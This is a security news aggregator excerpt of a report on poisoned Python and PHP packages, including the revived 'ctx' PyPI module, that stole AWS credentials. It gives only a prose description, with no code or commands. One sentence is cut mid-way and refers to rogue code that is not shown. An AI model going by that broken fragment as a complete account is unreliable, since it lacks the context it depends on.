Security News > 2022 > May > Poisoned Python and PHP packages purloin passwords for AWS access

Poisoned Python and PHP packages purloin passwords for AWS access
2022-05-25 18:04

A keen-eyed researcher at SANS recently wrote about a new and rather specific sort of supply chain attack against open-source software modules in Python and PHP. Following on-line discussions about a suspicious public Python module, Yee Ching Tok noted that a package called ctx in the popular PyPi repository had suddenly received an "Update", despite not otherwise being touched since late 2014.

In theory, of course, there's nothing wrong with old packages suddenly coming back to life.

Packages can become victims of secretive takeovers, where the password to the relevant account is hacked, stolen, reset or otherwise compromised, so that the package becomes a beachhead for a new wave of supply chain attacks.

The attackers aren't necessarily targeting any specific users of the package they compromise - often, they're simply watching and waiting to see if anyone falls for their package bait-and-switch.

Interestingly, the poisoned ctx package was soon updated twice more, with more added "Secret sauce" squirrelled away in the infected code, this time including more aggressive data-stealing code.

Get() in the rogue Python code you saw before) and fashioned into a URL. This time, the crooks have used http instead of https, thus not only stealing your secret data for themselves, but also making the connection without encryption, thus exposing your AWS secrets to anyone logging your traffic as it traverses the internet.


News URL

https://nakedsecurity.sophos.com/2022/05/25/poisoned-python-and-php-packages-purloin-passwords-for-aws-access/

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
PHP 9 1 43 115 124 283
Python 24 2 52 74 31 159